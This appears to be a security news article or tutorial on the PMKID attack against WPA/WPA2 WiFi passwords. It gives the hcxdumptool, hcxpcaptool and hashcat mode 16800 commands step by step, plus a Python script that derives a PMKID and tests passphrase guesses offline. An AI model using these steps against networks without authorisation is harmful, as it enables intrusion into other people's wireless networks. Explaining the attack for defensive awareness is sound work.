A new WPA/WPA2 cracking method lets attackers obtain a hash derived from a WiFi network's pre-shared key, which can then be used to crack the victim's password.
The method was discovered while researching attacks against the recently released WPA3 security standard, which is extremely difficult to crack because it uses the modern Simultaneous Authentication of Equals (SAE) key establishment protocol.
WPA3, the new security standard released by the Wi-Fi Alliance as the successor to WPA2, provides next-generation Wi-Fi security with new capabilities for both personal and enterprise networks.
The researcher found that the attack recovers the WPA/WPA2 password without capturing an EAPOL 4-way handshake. According to Steube, the developer of the Hashcat password cracking tool, the new attack is carried out against the RSN IE of a single EAPOL frame.
The attack also works against all 802.11i/p/q/r networks with roaming enabled, and it is not yet clear against how many vendors and router models the technique will work.
How does this WPA/WPA2 WiFi password attack work?
The Robust Security Network Information Element (RSN IE) is carried in 802.11 management frames and can also appear in a single EAPOL frame.
When a client attempts to authenticate with the router, the Pairwise Master Key ID (PMKID) can be captured from the RSN IE. "We can see here that the PMKID is captured using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of the fixed string label "PMK Name", the MAC address of the access point and the MAC address of the station."
To use this new attack, the following tools are required:
1. hcxdumptool V4.2.0 or higher
2. hcxtools V4.2.0 or higher
3. Hashcat v4.2.0 or higher
First, run hcxdumptool to retrieve the PMKID from the AP and write the capture to a pcapng file with the following command:
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
The output looks like this:
Start capturing (stop with ctrl+c)
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
Next, run hcxpcaptool to convert the captured data from pcapng format into a hash format accepted by hashcat.
The resulting file is divided into four columns separated by '*':
PMKID * MAC AP * MAC Station * ESSID
It is also recommended to use the following options:
-E retrieve possible passwords from WiFi traffic (in addition, this list will include ESSIDs)
-I retrieve identities from WiFi traffic
-U retrieve usernames from WiFi traffic
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
Finally, run hashcat to crack the hash. The new hash mode 16800 (PMKID) must be used, after which the hash can be attacked like any other hash type:
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
Hashcat then cracks the WPA-PMKID-PBKDF2 hash.
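The derivation quoted above (PMKID = HMAC-SHA1 keyed with the PMK over "PMK Name", the AP MAC and the station MAC) and the four-column 16800 file format, as an added example that is not code from the article or from the hcx/hashcat projects. It assumes the WPA2-Personal PMK derivation (PBKDF2-HMAC-SHA1 over the SSID, 4096 rounds) and uses the IEEE 802.11 PSK test vector ("password" / "IEEE") as the constructed lab network; the MAC addresses are the two shown in the hcxdumptool output above.

```python
import hashlib
import hmac

# Constructed lab values (not from the article): the IEEE 802.11 PSK test
# vector (passphrase "password", SSID "IEEE"). The two MAC addresses are the
# ones shown in the article's hcxdumptool output.
SSID = "IEEE"
PASSPHRASE = "password"
AP_MAC = bytes.fromhex("4604ba734d4e")
STA_MAC = bytes.fromhex("89acf0e761f4")


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1(PMK, "PMK Name" || AP MAC || station MAC), truncated to 128 bits."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def to_hashcat_16800(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """The four '*'-separated columns of a hashcat mode 16800 line (ESSID hex-encoded)."""
    return "*".join([pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()])


def pmkid_matches(captured: bytes, passphrase: str, ssid: str,
                  ap_mac: bytes, sta_mac: bytes) -> bool:
    """Offline check of one passphrase guess: one PBKDF2 plus one HMAC, no handshake
    needed. This is why a captured PMKID is enough to test weak passphrases and why
    the mitigation is a long, random PSK (or WPA3-SAE, which has no such value)."""
    candidate = compute_pmkid(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac)
    return hmac.compare_digest(candidate, captured)


if __name__ == "__main__":
    pmk = pmk_from_passphrase(PASSPHRASE, SSID)
    pmkid = compute_pmkid(pmk, AP_MAC, STA_MAC)
    print("PMK   :", pmk.hex())
    print("PMKID :", pmkid.hex())
    print("16800 :", to_hashcat_16800(pmkid, AP_MAC, STA_MAC, SSID))
```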
To obtain the PMKID, the attacker only has to attempt to authenticate to the wireless network.
This makes it much easier to obtain the hash derived from the pre-shared key, which can then be cracked offline, although how hard that cracking is still depends on the complexity of the password.